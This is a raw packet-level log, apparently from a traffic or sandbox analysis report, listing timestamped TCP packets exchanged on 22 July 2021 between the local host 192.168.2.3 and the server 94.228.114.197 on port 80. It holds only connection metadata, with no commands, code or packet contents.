Jul 22, 2021 11:28:01.292743921 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292757034 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.292767048 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292768002 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.292774916 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.292788029 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292834997 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292875051 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292876959 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.292896032 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292897940 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.292913914 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292929888 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292948008 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292965889 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.292982101 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293013096 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293030977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293035030 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.293047905 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293066025 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293081999 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.293082952 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293107986 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293107986 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.293123960 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293164968 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.293174028 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293196917 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.293198109 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293220043 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293241978 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293252945 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.293263912 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293287992 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293329954 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293330908 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.293353081 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293391943 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293414116 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293426991 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.293436050 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.293437004 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293459892 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293492079 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.293520927 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293541908 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293553114 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.293579102 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293605089 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293623924 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.293639898 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293663025 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293678045 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.293687105 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293724060 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.293730974 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293771982 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293793917 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293797016 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.293814898 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293837070 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293854952 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.293857098 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293881893 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293904066 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.293905020 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293926954 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293947935 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293950081 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.293968916 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293991089 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.293992043 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.294029951 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294043064 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.294054031 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294075012 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294097900 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294121027 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294121981 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.294131994 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.294146061 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294168949 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294183969 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.294190884 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294217110 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294235945 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.294253111 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294275999 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.294275999 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294296980 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294327974 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.294334888 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294358015 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294379950 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294404030 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294406891 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.294425964 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294430017 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.294446945 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294470072 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294485092 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.294491053 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294513941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294517040 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.294534922 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294564962 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294594049 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.294614077 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294637918 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294655085 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.294673920 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294694901 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294715881 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294715881 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.294759035 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.294773102 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294795036 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294819117 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294853926 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.294866085 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294891119 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294907093 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.294919968 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294958115 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294980049 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.294996977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295039892 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295062065 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295083046 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.295084000 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295094013 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.295109034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295166016 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.295170069 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295192003 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295213938 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295238018 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295255899 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.295260906 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295281887 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.295284986 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295306921 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295310974 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.295319080 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.295330048 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295353889 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295376062 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295397043 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295398951 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.295411110 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.295422077 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295429945 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.295439959 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295464039 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295485973 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295491934 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.295507908 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295530081 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.295531034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295556068 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295571089 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.295578957 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295594931 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.295600891 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295622110 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295643091 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295665026 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295669079 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.295686960 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295698881 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.295711994 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295734882 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295756102 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295757055 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.295778036 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295799971 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295810938 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.295820951 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295842886 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.295849085 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.295865059 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.296473980 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296498060 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296518087 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296540022 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296549082 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.296561956 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296565056 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.296582937 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296605110 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296622038 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.296627998 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296649933 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296669960 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296670914 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.296690941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296708107 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.296711922 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296735048 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296750069 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.296756029 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296777964 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296792030 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.296802044 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296823978 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296844959 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296845913 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.296866894 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296876907 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.296888113 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296909094 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296925068 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.296928883 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296950102 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296973944 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.296982050 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.296993971 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.297012091 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.297014952 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.297035933 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.297053099 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.297056913 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.297079086 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.297094107 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.297146082 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.297208071 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.297897100 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.297919989 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.297939062 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.297962904 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.297985077 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.297990084 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298007965 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298007965 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298029900 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298052073 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298060894 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298074007 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298094988 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298115969 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298122883 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298142910 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298151970 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298175097 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298197031 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298212051 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298218966 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298237085 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298242092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298263073 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298284054 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298305035 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298305988 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298330069 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298330069 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298352003 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298382998 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298407078 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298408031 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298424959 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298429012 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298449993 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298471928 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298492908 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298499107 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298515081 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298520088 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298532963 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298548937 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298572063 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298585892 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298594952 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298607111 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298619986 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298643112 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298662901 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298666000 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298688889 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298711061 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298712015 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298733950 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298743010 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298755884 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298777103 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298800945 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298823118 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298844099 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298846960 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298868895 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298870087 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298877954 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298892021 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298913956 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298928976 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.298935890 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298958063 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.298974037 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.299019098 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.316556931 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.375560999 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375590086 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375612020 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375627995 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375647068 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375669003 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375693083 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375708103 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.375715017 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375736952 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375758886 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375782967 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.375788927 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375788927 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.375812054 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375833988 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375854969 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375859022 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.375874043 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.375880003 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375902891 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375924110 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375945091 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375965118 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375987053 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.375977993 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.376034975 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.376041889 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.376058102 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.376763105 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.376787901 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.376806974 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.376827002 CEST	80	49720	94.228.114.197	192.168.2.3
